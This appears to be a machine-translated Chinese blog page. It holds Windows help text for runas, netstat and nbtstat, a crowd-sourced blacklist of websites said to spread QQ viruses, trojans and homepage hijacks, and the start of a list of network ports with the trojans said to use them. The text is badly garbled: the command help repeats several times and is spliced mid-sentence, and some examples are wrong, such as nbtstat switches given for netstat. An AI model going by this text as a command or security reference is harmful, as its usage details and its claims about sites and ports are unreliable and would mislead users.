runas [] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program 。.
Parameters. .
/profile 。.
Load the user profile. / Profile is the default. .
/no profile 。.
/ Noprofile not load the specified user profile. This allows applications to load faster, but in some applications can cause errors. .
/env 。.
Specify the current use of the network environment, rather than the user's local environment. .
/netonly 。.
Specified only for the specified remote access user information. .
/smartcard 。.
/ Smartcard credentials that are provided by the smart card. .
/showtrustlevels 。.
Lists / trustlevel switch items. .
/trustlevel 。.
Specify where the application is running authorized level. Use / showtrustlevels view the available trust levels. .
/user:UserAccountName 。.
Run program specified in his user account name. The format of the user account should be user @ domain or domain \ user. .
The program.
Designated to use the / user account to run specified program or command. .
/? 。.
Displays help at the command prompt. .
Comments.
Administrators can use a limited account permission for routine, non-managerial tasks, and only in the implementation of specific management tasks, before permission to use a larger account. Without logging off and log back on to complete this task, you can use the general account to log on, and then use the runas command to run the tools need for greater rights. .
For an example of using the runas command, see the "related topics".
Although the Administrator account using runas usually, but not limited to Administrator account. Any user who has multiple accounts can use alternate credentials, use the runas run the program, MMC console, or "put through the WINS server NetBIOS names registered and their re-register, type:..
nbtstat -RR 。.
To IP address every 5 seconds to display NetBIOS session statistics, type:. .
nbtstat -S 5 。.
Netstat. .
Displays active TCP connections, ports on the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays active TCP connections.
Syntax. .
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval] 。.
Parameters. .
-a 。.
Show all activities of the TCP connection and the computer's TCP and UDP port listener. .
-e 。.
Show Ethernet statistics, such as the number of bytes sent and received, the number of data packets. This parameter can be used in conjunction with the-s. .
-n 。.
TCP connection showed activity, but only in digital form of address and port number, do not try to determine the name. .
-o 。.
TCP connection and display activities, including the process for each connection ID (PID). In Windows Task Manager "processes" tab, find the PID-based applications. This parameter can be with-a,-n and-p combination. .
-p Protocol 。.
Display Protocol agreement specified the connection. In this case, Protocol can be tcp, udp, tcpv6 or udpv6. If this parameter used in conjunction with the-s show statistics by protocol, the Protocol can be tcp, udp, icmp, ip, tcpv6, udpv6, icmpv6 or ipv6. .
-s 。.
Display statistics by protocol. By default, the display TCP, UDP, ICMP and IP protocol statistics. If you installed Windows XP, IPv6, will be displayed on the IPv6 TCP, IPv6, on the UDP, ICMPv6, and IPv6 protocol statistics. Can use the-p parameter to specify the protocol set. .
-r 。.
Display IP routing table of contents. The equivalent parameters and route print command. .
Interval 。.
Every Interval seconds to re-display a selection of information. Press CTRL + C to stop the show statistics. If this parameter is omitted, netstat will print only a selection of information. .
/? 。.
Displays help at the command prompt. .
Comments.
With the order parameter must be used with a hyphen (-) rather than short-slash (/) as a prefix. .
Netstat provides the following statistical information:.
Proto. .
The name of the Protocol (TCP or UDP).
Local Address. .
The local computer's IP address and port number is being used. If you do not specify the-n parameter, it displays the IP address and port name corresponds to the local computer name. If the port has not been established, the port to an asterisk (*) is displayed.
Foreign Address. .
Connect the socket to the remote computer's IP address and port number. If you do not specify the-n parameter, it displays the IP address and port that corresponds to the name. If the port has not been established, the port to an asterisk (*) is displayed.
(State). .
Indicates the State of the TCP connection. Possible States are as follows:.
CLOSE_WAIT. .
CLOSED 。.
ESTABLISHED. .
FIN_WAIT_1 。.
FIN_WAIT_2. .
LAST_ACK 。.
LISTEN. .
SYN_RECEIVED 。.
SYN_SEND. .
TIMED_WAIT 。.
The TCP connection state information, see RFC 793. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
If you want to display the Ethernet statistics and the statistics for all protocols, type the following command:.
netstat-e-s. .
If you want to display only the TCP and UDP protocols, type the following command:.
netstat-s-p tcp udp. .
Every 5 seconds to display active TCP connections and the process ID, type the following command:.
nbtstat-o 5. .
If you want to digitally displays active TCP connections and the process ID, type the following command:.
nbtstat-n-o. .
Runas 。.
Allows the user to run with the permissions specified by other tools and procedures, rather than the user currently logged on to provide the permission. .
Syntax.
runas [] [/ env] [/ netonly] [/ smartcard] [/ showtrustlevels] [/ trustlevel] / user: UserAccountName program. .
Parameter.
/ Profile. .
To load a user profile. /Profile is the default value.
/ No profile. .
/Noprofile Specifies not to load a user profile. This allows an application to load more quickly, but some applications can also cause errors.
/ Env. .
Specifies the current network environment, instead of the user's local environment.
/ Netonly. .
Indicates that the specified user information is only used for remote access.
/ Smartcard. .
/Smartcard said credentials are provided by the smart card.
/ Showtrustlevels. .
/Trustlevel switch are listed.
/ Trustlevel. .
Specifies the authorization level. Use/showtrustlevels view available trust level.
/ User: UserAccountName. .
Program. .
Specifies that you want to use in/user the account specified in the program or command.
/?. .
Displays help at the command prompt.
Note. .
Administrators can use an account with restrictive permissions to perform routine, nonadministrative tasks only when performing specific administrative tasks using a larger account. You want to without logging off and back on login is done so with a regular account, and then use the runas command to run the tools that require the broader permissions..
Use the runas command examples, see the "Related Topics." .
Although the runas Administrator accounts are usually, but not limited to Administrator accounts. Any user with multiple accounts can use alternate credentials, use runas to run a program, MMC console, or "placed by the WINS server NetBIOS name registration and re-registration, type:.
nbtstat-RR. .
To every 5 seconds to display the IP address of the NetBIOS session statistics, type:.
nbtstat-S 5. .
Netstat 。.
TCP connection showed activity, the computer listening port, Ethernet statistics, IP routing table, IPv4 statistics (for IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, IPv6, TCP through and through the IPv6-UDP protocol). If used without parameters, netstat displays active TCP connections. .
Syntax.
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]. .
Parameter.
-A. .
Displays all active TCP connections and the computer is listening on TCP and UDP ports.
-E. .
Displays Ethernet statistics, such as the number of bytes transmitted and received, the number of packets. This parameter can be used in conjunction with-s.
-N. .
Displays active TCP connections, however, only in digital form of address and port number, do not try to determine the name.
-O. .
Displays active TCP connections and includes each connection process ID (PID). You can in Windows Task Manager's "processes" tab to find applications that are based on the PID. This parameter can be-a,-n and-p..
-P Protocol. .
Displays the Protocol specified by the agreement. In this case, the Protocol can be tcp, tcpv6, udp, or udpv6. If this parameter is used in conjunction with the-s displays per-protocol statistics, the Protocol can be tcp, udp, icmp, ip, tcpv6, ipv6, icmpv6, or udpv6.
-S. .
Display statistics by Protocol. By default, displays the TCP, UDP, ICMP and IP protocol statistics. If you install the IPv6 protocol for Windows XP, it will display the relevant IPv6 TCP, UDP, IPv6, ICMPv6, and statistical information about the IPv6 protocol. You can use the-p parameter specifies the set of protocols.
-R. .
Displays the contents of the IP routing table. The route print command is equivalent.
Interval. .
Every Interval seconds replay once selected information. Press CTRL + c to stop redisplaying statistics. If this argument is omitted, netstat will print only the selected information at a time.
/?. .
Displays help at the command prompt.
Note. .
Used in conjunction with the command parameter must start with a hyphen (-) instead of to short a slash (/) as a prefix.
Netstat provides the following statistics:. .
Proto 。.
Protocol name (TCP or UDP). .
Local Address 。.
Local computer's IP address and port number being used. If you do not specify the-n parameter, it displays the name of IP address and port corresponding to the local computer name. If the port has not been established, the port with an asterisk (*) show. .
Foreign Address 。.
Connecting the slot of the remote computer IP address and port number. If you do not specify the-n parameter, it displays the corresponding IP address and port name. If the port has not been established, the port with an asterisk (*) show. .
(state) 。.
That the state of TCP connections. Possible states are as follows:. .
CLOSE_WAIT 。.
CLOSED. .
ESTABLISHED 。.
FIN_WAIT_1. .
FIN_WAIT_2 。.
LAST_ACK. .
LISTEN 。.
SYN_RECEIVED. .
SYN_SEND 。.
TIMED_WAIT. .
The TCP connection state information, see RFC 793.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display Ethernet statistics and statistics for all protocols, type the following command:. .
netstat -e -s 。.
To display only TCP and UDP protocol statistics, type the following command:. .
netstat -s -p tcp udp 。.
To display an event every 5 seconds, the TCP connection and the process ID, please type the following command:. .
nbtstat -o 5 。.
To display activity in digital form TCP connections and the process ID, please type the following command:. .
nbtstat -n –o 。.
Runas. .
Allows the user to use other permissions to run the specified tool and procedure instead of the user's current logon provides.
Syntax. .
runas [] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program 。.
Parameters. .
/profile 。.
Load the user profile. / Profile is the default. .
/no profile 。.
/ Noprofile not load the specified user profile. This allows applications to load faster, but in some applications can cause errors. .
/env 。.
/netonly 。.
Specified only for the specified remote access user information. .
/smartcard 。.
/ Smartcard credentials that are provided by the smart card. .
/showtrustlevels 。.
Lists / trustlevel switch items. .
/trustlevel 。.
Specify where the application is running authorized level. Use / showtrustlevels view the available trust levels. .
/user:UserAccountName 。.
Run program specified in his user account name. The format of the user account should be user @ domain or domain \ user. .
The program.
Designated to use the / user account to run specified program or command. .
/? 。.
Displays help at the command prompt. .
Comments.
Administrators can use a limited account permission for routine, non-managerial tasks, and only in the implementation of specific management tasks, before permission to use a larger account. Without logging off and log back on to complete this task, you can use the general account to log on, and then use the runas command to run the tools need for greater rights. .
For an example of using the runas command, see the "related topics".
Although the Administrator account using runas usually, but not limited to Administrator account. Any user who has multiple accounts can use alternate credentials, use the runas run the program, MMC console or. ".
Control Panel items ".
If you want to use the Administrator account on the computer, the / user:, type one of the following parameters:. .
/user:AdministratorAccountName@ComputerName 。.
/ User: ComputerName \ AdministratorAccountName. .
21: 19: 59 | comments | Permalink | Trackback (0) | blog | network applications.
Ministry of Public Security listed blacklist of malicious sites!. .
Malicious Web sites blacklist--don't point to these stations, no joke!.
Note: the website of the virus susceptible to QQ. .
http://www。. QQ3344. .com (QQ virus).
http://www. . Dj3344. . Com (QQ virus). .
http://www。. QQ3344. .com (QQ virus).
http://www. . Yysky. . Net (QQ virus). .
。.
The following 25 sites are me and my friends have experienced, or heard someone say, the odd black incomparable. .
If you don't believe, then try it, you got it!.
1. . Http://www. . Dj3344. . Com open, reboot your home becomes it, and spread to others through QQ, is now whirlwind trip, or worse incomparable! . .
2。.http://www。. qq168。.net 。.
3. . Http://www. . 777 888. . Com. .
4。.http://WWW。. 5dsoft。.com 。.
5. . Http://www. . Wokoo. . Net. .
6。.http://movie。. sx。.zj。.cn 。.
7. . Http://yeapple. . Com. .
9。.http://www。. youmiss。.com 。.
10. . Http://www. . Cctv8. . Net. .
11。.http://www。. kuliao。.com 。.
12. . Http://www. . Yyqy. . Com. .
13。.http://winzheng。. 126。.com 。.
14. . Http://www. . Sunvod. . Com. .
15。.http://www。. t168。.com 。.
16. . Http://www. . Boliwo. . Com. .
17。.http://www。. coolcdrom。.com 。.
18. . Http://www. . Zhengdian. . ComOE did not let the title bar). .
19。.http://girlchinese。. ComIE's home page has also been changed).
20. . Http://www. . Yibinren. . Com is more terrible to the default page of IE have changed his. .
21。.http:// http://www。. mtv51。.com 。.
22. . Http://www. . 163 [1]. . Com is what music network. Similar symptoms and upstairs. I have got the last of more than an hour after the changes and come back! ! ! Also for viruses! ! . .
23。.http:// http://www。. 37021. .com look! not 3721, heinous hate in your machine was full of tricks: registry/start \ computer configuration file/another dll files and the Resource Manager cannot browse hidden files, the most annoying!! 。.
24. . Http://www. . Cnqb. . Nethttp: / / www. . Qq3344. . Com (net) and article 12 are similar to these three sites among the variants of this malignant. .
youlove。. 3322. .net/picture. malicious code .exe has characteristics also entrainment virus: Trojan. .Pwdbox. .d.
http://www. . 58 589. . Com has the characteristics of things, malicious code for viruses: Trojan. . Tsqj. . Setup. .
tty。. Yyun. .net and the hazards of almost.
http://www. . Ftlink. . Net general malicious code. .
home。. Kimo. .com. .tw/avnvyou520/General malicious code.
http://www. . Pixpox. . Com vicious porn sites. Unknown plug-in is loaded and automatically turn on the computer back door and in every corner of the computer left the site a major safety malicious programs. .
http://www。. K163. .com (Hunter variants and DJ344 QQ3344 QQ168 is a company).
http://www. . Pk. . Com. .
http://www。. xxx。.com 。.
http://204. . 177. .92. .68/rotate/r3. . Jhtml (to TRY to make your IE to see the absolute to the Recycle Bin). .
http://www。. ehomeday。.com"; TARGET=_blank>[url]http://www。. fassia。.net/wmed/index1。.h。.http://www。. Ehomeday. .com [/url] (search time it will give you a handful of OH!!).
http://www. . Jinpin. . Net this is the same as before, old-fashioned. .
http://www。. Cnqb. .net (prohibition of your registry, Home, home address bar is grayed out, right).
2. . Hothack. . Home. . Chinaren. . Com. .
3. happiness http://www. 777888。.com 。.
4. . Century soft http://WWW. . 5DSOFT. . COM. .
5. fate http://www. wokoo。.net 。.
6. . Television http://movie. . Sx. . Zj. . Cn. .
7. ** ** flower NET.
8http: / / xyxy68. . 8u8. . Net;. .
9http://www。. youmiss。.com ; 。.
10http: / / www. . Cctv8. . Net;. .
11http://www。. kuliao。.com ; 。.
12http: / / www. . Yyqy. . Com;. .
13http://winzheng。. ******** ; 。.
14http: / / www. . Sunvod. . Com;. .
15http://www。. t168。.com ; 。.
16http: / / www. . Wokoo. . Net;. .
17http://www。. Coolcdrom. .com (to this site, it will start a group in your caterer, restart.
After the title still! ). .
18http://www。. Zhengdian. .com (OE title bar didn't let go).
19http: / / girlchinese. . Com (IE's home page was changed). .
20http://www。. girl008。.com ; 。.
21http: / / xajh. . 15 888. . Net;. .
22http://www。. 51bug。.com ; 。.
23http: / / www. . Wplune. . Com;. .
24http://www。. 777888。.net ; 。.
25Http: / / pollen. . My001. . Net;. .
26Http://www。. yule21。.com ; 。.
27Http: / / www. . Fish3000. . Com;. .
28Http://www。. kuliao。.com ; 。.
29Http: / / www. . 666e. . Com;. .
30Http://qm。. 8ok。.com ; 。.
31Http: / / www. . Guosir. . Ccoo. . Com;. .
32Http://www。. 163mm。.com ; 。.
33Http: / / WWW. . CNOOO. . COM;. .
34. stock http://www. es158。.com 。.
35. . Asian beauties Http: / / www. . Aisa-girl. . Net. .
36. glassy http://www. BOLIWU。.COM 。.
37. . Entertainment Ming Http: / / www. . Cctv8. . NetHttp: / / www. . Cctv1. . Net. .
38. stock market means http://www. 89005。.com 。.
39. . QQ sugar site. .
40. code cool ** **.
41. . QQ I love your site. .
http://www。. Play. .cn. .gs (to this site, it will start a group in your caterer, restart later.
Title still! ). .
43.. youth http://newyouth. 3322。.net) 。.
http://chinabdkx. . 363. . Net;. .
45. dynamic download http://www. zknew。.com/) 。.
46. . East tide http://www. . Dhchao. . Com /). .
47http://www。. top666。.net/ ; 。.
48. . Xiaxin http://www. . Amoisonic. . Com /). .
49. Xinjiang Brigade http://www. markguide。.com) 。.
50. . Star Entertainment http://www. . Xyxc. . Ccoo. . Com). .
51. stock investment wisdom http://989898. ** ** * ** *).
52. . Nu http://www. . Flyingwalk. . Com). .
53. night http://www. yezine。.net) 。.
54. . MM Entertainment http://www. . Mmgirls. . Com). .
55. wow http://www. wa***。.net) 。.
56. . You to http://www. . Net5w. . Com). .
57. free bird-http://www. fbstu。.com) 。.
58. . Money http://www. . Qlwl. . Com). .
59. Red hacker http://golsz ** ** * ** *).
60http: / / www. . Yibinren. . Com (more terrible to the default page of IE have changed his a). .
61http://www。. yinshang。.com ; 。.
62http: / / www. . Ncunet. . Com;. .
63http://www。. 555666。.net ; 。.
64http: / / qqtwz. . ********;. .
65http://www。. fm1058。.cc/ ; 。.
66http: / / meim. . Y365. . Com;. .
67http://www。. qq520。.net ; 。.
68http: / / jjkafei. . Longcity. . Net;. .
69http://chow。. yesky。.net ; 。.
70http: / / oicq. . Hk. . St;. .
71http://www。. my288。.com ; 。.
72http: / / www. . Youmiss. . Com;. .
73http://www。. laws-online。.net ; 。.
74http: / / www. . Hj168. . Net;. .
75http://16888。. 6to23。.com ; 。.
76http: / / www. . Love520. . Net;. .
77http://www。. qq520。.com ; 。.
78http: / / www. . Mmgirls. . Com;. .
79http://www。. 555666。.net ; 。.
80http: / / www. . Ezhgc. . Com;. .
81http://www。. ezhgc。.com ; 。.
82http: / / www. . Eastedu. . Com. . Cn;. .
83http://www。. 435000。.com ; 。.
84http: / / sdik. . 8ok. . Net;. .
85http://feiying。. coolwww。.net ; 。.
86http: / / zhongxuesheng. . Myrice. . Com;. .
87. Belle photo network.
88. . For all business network. .
89. chutian music network.
90. . Faint Desktop Network. .
91http://www。. laws-online。.net ; 。.
92http: / / www. . Youmiss. . Com;. .
93http://www。. my288。.com ; 。.
94. . YES9999. . Com. .
95. in particular, the personal television online website [many yellow film site].
96 Guilin wide http://www. . Nnptt. .com / tv /. .
97 movies new http://vod. hengshui。.com/ 。.
98:: excited line cinema: http://tv. . Megajoy. .com / video / movies /. .
99http://h444。. net/ 。.
(Trojan.. Qqwebaut.. A and its variants trojan.. Qqwebaut.. B). .
http://update。. myxq。.com /ads。.htm 。.
http://www. . Happy666. . Net. .
http://update。. myxq。. com 。.
http://www. . Myxq. . Com. .
Network software download station blacklists, we access the download site requires very attention!.
1, site name: dissolved but the software stops. .
Website address: http://www. fzqk。.com/。.
Open the download page to download the pop-up dialog box Kingsoft Duba and WPS, accidentally on down. And advertising giant more, download the address with the ad addresses mixed together, very easy to delays. And some can not download! . .
2. site name: choosers website.
Website address: http://www. . Ttjj. .com / index. . Php. .
Choosers websites, malicious modification of the home page, and you cannot restore a blank page!.
3, Site name: Site Home. .
Website address: lingghost. jahee。.com。.
Problem Description: carry viruses. .
Proof the post address: ahee http://lingghost. .j. .com/55/soft/1038. .htm.
(We accidentally clicked). .
4, website name: China fever IT Technology Alliance-dream software Park.
Web Address: http://soft. . 5icrack. . Com /. .
Problem description: all bundled word search and online advertising junk, pigs in the user's knowledge that automatically install, even if you click on cancel midway also automatically install success!.
5, Site Name: Top Hero Network. .
Website address: http://www. djyx。.com/。.
Problem Description: There are many available for download malicious software bundle (such as viruses, Trojan horses, black holes, advertising, etc.). .
6, website name: Crystal Serendipity.
Website address: http://www. . Lovehy. . Com /. .
Problem description: available for download in the software bundle many malicious (e.g. virus, Trojans, black hole, the commercials, etc.).
7, site name: cat download. .
Website address: http://down. kittygd。.com/。.
Members click on their advertising trick. .
Main station advertising giant lot.
Yes, but after the previous revision into a money making machine complete. .
8, website name: many software station.
Website address: http://www. . Ddooo. . Com /. .
Problem description: available for download software many poison.
9, web site: Future Software Park. .
Website address: http://www. orsoon。.com。.
Symptoms: Some pages have a vicious script. . Css, in arcldrer. . Exe Trojan. .
21: 09: 05 | comments | Permalink | Trackback (0) | blog | network applications.
Port and the port closed Daquan method. .
I. port encyclopedia.
Port: 0. .
Services: Reserved.
Note: usually used to analyze the operating system. This method can work on some systems Yin Wei, "0" is the invalid port, when you try using the usual when it closed port connection Jiang produce different results. A typical scan, using the IP address is 0. .0. .0. .0, Set the ACK bit in the Ethernet layer broadcast. .
Ports: 1.
Services: tcpmux. .
Description: this show was looking for SGI Irix machines. Irix is a major provider of tcpmux, default tcpmux in this system has been opened. Irix machines in publishing is contains several default account without a password, such as: IP, UUCP, GUEST NUUCP, DEMOS, TUTOR, DIAG, OUTOFBOX, etc. After the installation of many administrators forget to delete these accounts. Therefore search HACKER on the Internet and to use these accounts tcpmux.
Ports: 7. .
Services: Echo.
Description: to see a lot of people search Fraggle amplifier, is sent to X. . X. . X. .0 And X. . X. . X. .255 Information. .
Port: 19.
Services: Character Generator. .
Description: this is a service only to send characters. UDP version will receive UDP packet contains garbage characters after the response packet. TCP connection contains garbage characters when sending data until the connection closes. HACKER uses IP spoofing can launch a DoS attack. Forged two chargen servers UDP packets. Similarly Fraggle DOS attacks to the destination address of the port, a forgery victims broadcast IP packets to the victims in order to respond to these data overload.
Port: 21. .
Services: FTP.
Description: FTP server and open port for upload, download. The most common for attackers to find the FTP server to open anonymous method. These servers can read and write with the directory. Trojan Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash and Blade Runner are open ports. .
Port: 22.
Services: Ssh. .
Description: PcAnywhere established TCP and the port may be looking for ssh. This service has many weaknesses, if configured to a specific mode, many use RSAREF library version there will be many loopholes exist.
Port: 23. .
Services: Telnet.
Description: Remote login, remote access UNIX intruder in the search service. In most cases this port scan to find the machine running the operating system. Also use other technologies, the invaders will find the password. Trojan Tiny Telnet Server to open the port. .
Ports: 25.
Services: SMTP. .
Description: SMTP server is an open port used to send messages. An intruder can find the SMTP server for delivery to their SPAM. Intruder's account is closed, they need to connect to high-bandwidth, E-MAIL server, to simple information delivery to a different address. Trojans Antigen, Email Password Sender, Haebu Coceda, Shtrilitz WinPC, Stealth, is opening this port WinSpy.
Port: 31. .
Authentication service: MSG..
Description: Trojan Master Paradise, Hackers Paradise open this port. .
Port: 42.
Service: WINS Replication. .
Description: WINS replication.
Port: 53. .
Services: Domain Name Server (DNS).
Description: DNS server open port, the intruder may be trying to regional delivery (TCP), deception DNS (UDP) or hide other communications. Therefore _blank "> firewall is often filtered or record this port..
Port: 67.
Services: Bootstrap Protocol Server. .
Note: DSL and Cable modem via the _blank "> regular saw a large number of firewall is sent to the broadcast address 255. .255. .255. .255. These machines in a request to the DHCP server addresses. HACKER enters them, often assigned an address as a local router launched a large number of intermediary (man-in-middle) attacks. The client to request configuration 68 port broadcast, the server responds to the 67 port broadcast requests. The use of radio is because the client does not know the IP address can be sent.
Port: 69. .
Services: Trival File Transfer.
Description: bootp with many servers and provide this service, easy to download from the system boot code. But they are often due to an error from the system configuration Ershi intruder to steal any documents. They can also be used to the system write to a file. .
Port: 79.
Services: Finger Server. .
Description: the intruder is used to obtain user information, query the operating system detects a known buffer overflow error response from your machine to other machines in the Finger scanning.
Port: 80. .
Services: HTTP.
Description: for website. Executor Trojan open this port. .
Port: 99.
Services: Metagram Relay. .
Description: backdoor ncx99 open this port.
Port: 102. .
Services: Message transfer agent (MTA)-.400 over TCP/IP X..
Description: The message transfer agent. .
Port: 109.
Services: Post Office Protocol-Version3. .
Description: the POP3 server and open the port for receiving messages, the client access server-side mail services. There are many recognized the POP3 service. About user name and password of the Exchange buffer overflow vulnerabilities at least 20, this means that an intruder can really get into the system before landing. After a successful login has additional buffer overflow error.
Port: 110. .
Services: Sun RPC services all ports.
Description: The common RPC service rpc. . Mountd, NFS, rpc. . Statd, rpc. . Csmd, rpc. . Ttybd, amd so on. .
Port: 113.
Services: Authentication Service. .
Description: this is one of many protocols that run on your computer, used to identify users of the TCP connection. Use standard this kind of service you can get a lot of computer information. But it can be as many of the services, in particular, FTP, POP, IMAP, SMTP, IRC, etc. Usually if you have many customers through _blank "> firewall to access these services, you will see a number of the port of connection requests. Remember, if you block this port, the client will feel in _blank "> the other side of the firewall and E-MAIL server slow connections. . This will stop the slow connection. .
Port: 119.
Services: Network News Transfer Protocol. .
Description: NEWS newsgroup transmission protocol, hosted USENET traffic. The port of connection, typically a people searching for USENET server. Most of the ISP restrictions, only their customers can access their newsgroup server. Open the newsgroup server will allow you to send/read any posts, access is restricted newsgroup server, anonymous posting or sending SPAM.
Port: 135. .
Services: Location Service.
Description: Microsoft at this port to run DCE RPC end-point mapper for its DCOM services. This UNIX 111 port function is similar. DCOM and RPC services use the computer on the end-point mapper register their location. Remote client to connect to the computer, they find the end-point mapper to find the location of services.。.
Port: 137,138,139. .
Services: NETBIOS Name Service.
Note: 137,138 of which is the UDP port, as when transferring files through Network Neighborhood to use this port. The 139 port: connection through this port into trying to get NetBIOS / SMB service. This protocol is used for windows file and printer sharing and SAMBA. There WINS Regisrtation also use it. .
Port: 143.
Services: Interim Mail Access Protocol v2. .
Description: and POP3 security issues, there exist many IMAP server buffer overflow vulnerability. Remember: a LINUX worms (admv0rm) propagation through this port, so many of the port scan from unknowingly infected users. When REDHAT LINUX in their release version default allow IMAP, these vulnerabilities became very popular. This port is also used to IMAP2, but is not popular.
Services: SNMP.
Description: SNMP to allow remote management of devices. All configuration and operational information stored in the database, the information available through SNMP. Many administrators configuration errors will be exposed to the Internet. Cackers will try to use the default password public, private access to the system. They may test all possible combinations. SNMP packets may be wrong to point the user's network. .
Port: 177.
Services: X Display Manager Control Protocol. .
Description: many intruders through its access controls, it also X-windows need to open port 6000.
Port: 389. .
Services: LDAP, ILS.
Description: Lightweight Directory Access Protocol and NetMeeting Internet Locator Server to share the port. .
Port: 443.
Services: Https. .
Description: Web browsing, encrypted and cannot be provided through the secure port to transfer another HTTP.
Port: 456. .
Services: [NULL].
Description: Trojan HACKERS PARADISE open this port. .
Port: 513.
Services: Login, remote login. .
Description: using cable modem or DSL login to subnet in the UNIX computer. These people as an intruder enters their system provided the information.
Port: 544. .
Services: [NULL].
Description: kerberos kshell. .
Port: 548.
Services: Macintosh, File Services (AFP / IP). .
Note: Macintosh, file services.
Port: 553. .
Services: CORBA IIOP (UDP).
Note: Use the cable modem, DSL, or will see the port VLAN broadcast. CORBA is an object-oriented RPC system. Intruders can use the information into the system. .
Port: 555.
Services: DSF. .
Description: Trojans PhAse1. .0, Stealth Spy, IniKiller open this port.
Port: 568. .
Services: Membership DPA.
Description: Membership DPA. .
Port: 569.
Services: Membership MSN. .
Note: membership to MSN.
Port: 635. .
Services: mountd.
Description: Linux's mountd Bug. This is a scan of a popular BUG. Most of this is based on UDP port scan, but the increase mountd TCP-based (mountd to run on two ports). Remember that mountd can run on any port (in the end is which port, port 111 needs to do portmap query), but Linux is the default port 635, like NFS usually runs on port 2049. .
Port: 636.
Services: LDAP. .
Description: SSL (Secure Sockets layer).
Port: 666. .
Services: Doom Id Software.
Description: Trojan Attack FTP, Satanz Backdoor open this port. .
Port: 993.
Services: IMAP. .
Description: SSL (Secure Sockets layer).
Port: 1001,1011. .
Services: [NULL].
Description: Trojan Silencer, WebEx port 1001 open. Trojan Doly Trojan port 1011 open. .
Port: 1024.
Services: Reserved. .
Note: it is a dynamic port began, many programs and do not care which port is connected to a network, they request the system assigns the next free port. Based on this assignment from port 1024. This means the first making requests to the system are assigned to port 1024. You can restart the machine, open a Telnet, and then opens a window running natstat-a will see Telnet port assigned to 1024. There are also SQL session using the port and port 5000.
Port: 1025,1033. .
Services: 1025: network blackjack 1033: [NULL].
Description: Trojan netspy open the two ports. .
Port 1080.
Services: SOCKS. .
Description: this agreement to channel mode through the _blank "> firewall that allows the _blank" > behind the firewall through an IP address to access the Internet. In theory it should allow only internal communication to reach the INTERNET. However, due to incorrect configuration, it will allow in _blank "> firewall external attacks through the _blank" > firewall. WinGate regular session of the IRC chat rooms, often see this situation.
Port: 1170. .
Services: [NULL].
Description: Trojan Streaming Audio Trojan, Psyber Stream Server, Voice open this port. .
Port: 1234, 1243, 6711, 6776.
Services: [NULL]. .
Description: Trojans SubSeven2. Ultors Trojan .0, open port 1234, 6776. Trojans SubSeven1. .0/1243 1. .9 open, 6711, 6776 port.
Port: 1245. .
Services: [NULL].
Description: Trojan Vodoo open this port. .
Port: 1433.
Service: SQL. .
Note: Microsoft SQL services and open ports.
Port: 1492. .
Services: stone-design-1.
Description: Trojan FTP99CMP open this port. .
Port: 1500.
Services: RPC client fixed port session queries. .
Description: RPC clients fixed port session queries.
Changes recommended by top mobile lock back to delete spam complaints cream made with black paper. .
2006-02-06 10: 58: 03 subject: port Guinness and port shutdown method.
SOFT. .
Points: 195.
Title: first year students. .
Online: 647 minutes.
Published: 107. .
Your personal information.
Port: 1503. .
Services: NetMeeting .120 T..
Description: NetMeeting T. .120. .
Port: 1524.
Services: ingress. .
Description: many attack script will install a backdoor SHELL to this port, especially for SUN systems Sendmail and RPC service vulnerability scripts. If you have just installed the _blank "> firewall to see on this port, the connection attempt is likely the reason mentioned above. You can try to Telnet to the users of the port on your computer, see if it will give you a SHELL. Connect to 600/pcserver also exists for this issue.
Port: 1600. .
Services: issd.
Description: Trojan Shivka-Burka open this port. .
Port: 1720.
Service: NetMeeting. .
Description: a NetMeeting call Setup .233 H..
Port: 1731. .
Services: NetMeeting Audio Call Control.
Description: NetMeeting Audio Call Control. .
Port: 1807.
Services: [NULL]. .
Description: Trojans open this port SpySender.
Port: 1981. .
Services: [NULL].
Description: Trojan ShockRave open this port. .
Port: 1999.
Services: cisco identification port. .
Description: Trojan BackDoor open this port.
Port: 2000. .
Services: [NULL].
Description: Trojan GirlFriend 1. .3, Millenium 1. .0 Open this port. .
Port: 2001.
Services: [NULL]. .
Description: Trojans Millenium 1. .0, Trojan Cow open this port.
Port: 2023. .
Services: xinuexpansion 4.
Description: The Trojan Horse Pass Ripper open this port. .
Port: 2049.
Service: NFS. .
Description: NFS programs often run on this port. Often need to access the Portmapper service run on the query which port.
Port: 2115. .
Services: [NULL].
Description: Trojan Bugs open this port. .
Port: 2140, 3150.
Services: [NULL]. .
Description: Deep Throat Trojan. 1 .0 .0/3. open this port.
Port: 2500. .
Services: RPC client using a fixed port session replication.
Description: The fixed port session replication RPC client. .
Port: 2583.
Services: [NULL]. .
Description: Trojans Wincrash 2. .0 open this port.
Port: 2801. .
Services: [NULL].
Description: Trojan Phineas Phucker open this port. .
Port: 3024, 4092.
Services: [NULL]. .
Description: Trojans open this port WinCrash.
Port: 3128. .
Services: squid.
Note: This is the squid HTTP proxy server, the default port. Attackers scan this port is to search for a proxy server and anonymous access to Internet. Search other proxy server will see the port 8000, 8001,8080,8888. Another reason for the port scan is the user is entering a chat room. Other users will test the port to determine whether to support the user's machine agent. .
Port: 3129.
Description: Trojans open this port Master Paradise.
Port: 3150. .
Services: [NULL].
Description: The Invasor Trojans open the port. .
Port: 3210, 4321.
Services: [NULL]. .
Description: Trojans open this port SchoolBus.
Port: 3333. .
Services: dec-notes.
Description: Trojan Prosiak open this port. .
Port: 3389.
Services: Super Terminal. .
Description: Windows 2000 Terminal open this port.
Port: 3700. .
Services: [NULL].
Description: Portal of Doom Trojan horse open this port. .
Port: 3996, 4060.
Services: [NULL]. .
Description: Trojans open this port RemoteAnything.
Port: 4000. .
Services: QQ client.
Description: Tencent QQ client open this port. .
Port: 4092.
Services: [NULL]. .
Description: Trojans open this port WinCrash.
Port: 4590. .
Services: [NULL].
